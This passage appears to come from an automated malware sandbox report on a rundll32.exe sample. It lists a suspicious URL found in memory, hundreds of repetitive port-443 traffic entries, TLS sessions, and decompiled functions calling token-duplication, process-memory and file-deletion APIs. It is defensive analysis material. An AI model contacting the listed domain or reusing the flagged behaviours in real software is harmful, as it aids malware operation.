                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/)
                      Source: rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/ll
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownHTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49727 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.42.73.28:443 -> 192.168.2.5:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.207:443 -> 192.168.2.5:49781 version: TLS 1.2
                      Source: C:\Windows\System32\rundll32.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CB0C4 NtOpenKey,RtlpNtOpenKey,4_2_00000237C16CB0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C78C0 NtReadFile,4_2_00000237C16C78C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C7B40 NtFreeVirtualMemory,4_2_00000237C16C7B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CAD34 NtAllocateVirtualMemory,4_2_00000237C16CAD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,4_2_00000237C16CB1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C79C8 NtClose,4_2_00000237C16C79C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C77B0 RtlInitUnicodeString,NtCreateFile,4_2_00000237C16C77B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C378C NtClose,4_2_00000237C16C378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C7588 RtlInitUnicodeString,NtCreateFile,NtClose,4_2_00000237C16C7588
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,4_2_00000237C16C463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C7A54 NtWriteFile,4_2_00000237C16C7A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16D0AC0 NtFreeVirtualMemory,4_2_00000237C16D0AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C7ACC NtClose,4_2_00000237C16C7ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16D0A78 NtClose,4_2_00000237C16D0A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C7694 RtlInitUnicodeString,NtDeleteFile,4_2_00000237C16C7694
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16D0A90 NtDeleteFile,4_2_00000237C16D0A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C745C RtlInitUnicodeString,NtOpenFile,NtClose,4_2_00000237C16C745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CCB54 NtDelayExecution,4_2_00000237C16CCB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C7704 NtQueryInformationFile,4_2_00000237C16C7704
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16D0AF0 NtWriteFile,4_2_00000237C16D0AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E248C NtFreeVirtualMemory,8_3_000001E3B57E248C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E241C NtAllocateVirtualMemory,8_3_000001E3B57E241C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006A2C8: DeviceIoControl,3_2_000000018006A2C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017FE83_2_0000000180017FE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006DFF43_2_000000018006DFF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800220D83_2_00000001800220D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018007C1403_2_000000018007C140
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800601743_2_0000000180060174
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018008023C3_2_000000018008023C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000834C3_2_000000018000834C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006C4703_2_000000018006C470
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800784E03_2_00000001800784E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800764F03_2_00000001800764F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800605783_2_0000000180060578
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800105803_2_0000000180010580
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004E5DC3_2_000000018004E5DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800626003_2_0000000180062600
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800026103_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800046383_2_0000000180004638
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004A6503_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006E7603_2_000000018006E760
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800647B03_2_00000001800647B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018007E7C73_2_000000018007E7C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800769303_2_0000000180076930
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800629543_2_0000000180062954
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006A9943_2_000000018006A994
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006E9FC3_2_000000018006E9FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180082A183_2_0000000180082A18
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180072A273_2_0000000180072A27
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010B583_2_0000000180010B58
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180026C843_2_0000000180026C84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ECF43_2_000000018001ECF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008E203_2_0000000180008E20
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180052FD83_2_0000000180052FD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003AFE83_2_000000018003AFE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018005D0143_2_000000018005D014
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006F0B43_2_000000018006F0B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800630CC3_2_00000001800630CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018005912C3_2_000000018005912C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004B1A43_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800492783_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018007B2D03_2_000000018007B2D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002B2EC3_2_000000018002B2EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006D3D43_2_000000018006D3D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800033E03_2_00000001800033E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800754803_2_0000000180075480
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800694A03_2_00000001800694A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018005958C3_2_000000018005958C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800576DC3_2_00000001800576DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800097E03_2_00000001800097E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800277FC3_2_00000001800277FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002D9643_2_000000018002D964
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180073B603_2_0000000180073B60
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018007BBB03_2_000000018007BBB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BC383_2_000000018001BC38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018005DD183_2_000000018005DD18
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180073DF03_2_0000000180073DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011DF03_2_0000000180011DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018005BE6C3_2_000000018005BE6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004FF883_2_000000018004FF88
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C10304_2_00000237C16C1030
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E4B508_3_000001E3B57E4B50
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58797088_3_000001E3B5879708
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E453C8_3_000001E3B57E453C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5862B388_3_000001E3B5862B38
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586DB348_3_000001E3B586DB34
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5850B548_3_000001E3B5850B54
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582EA848_3_000001E3B582EA84
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5810A8A8_3_000001E3B5810A8A
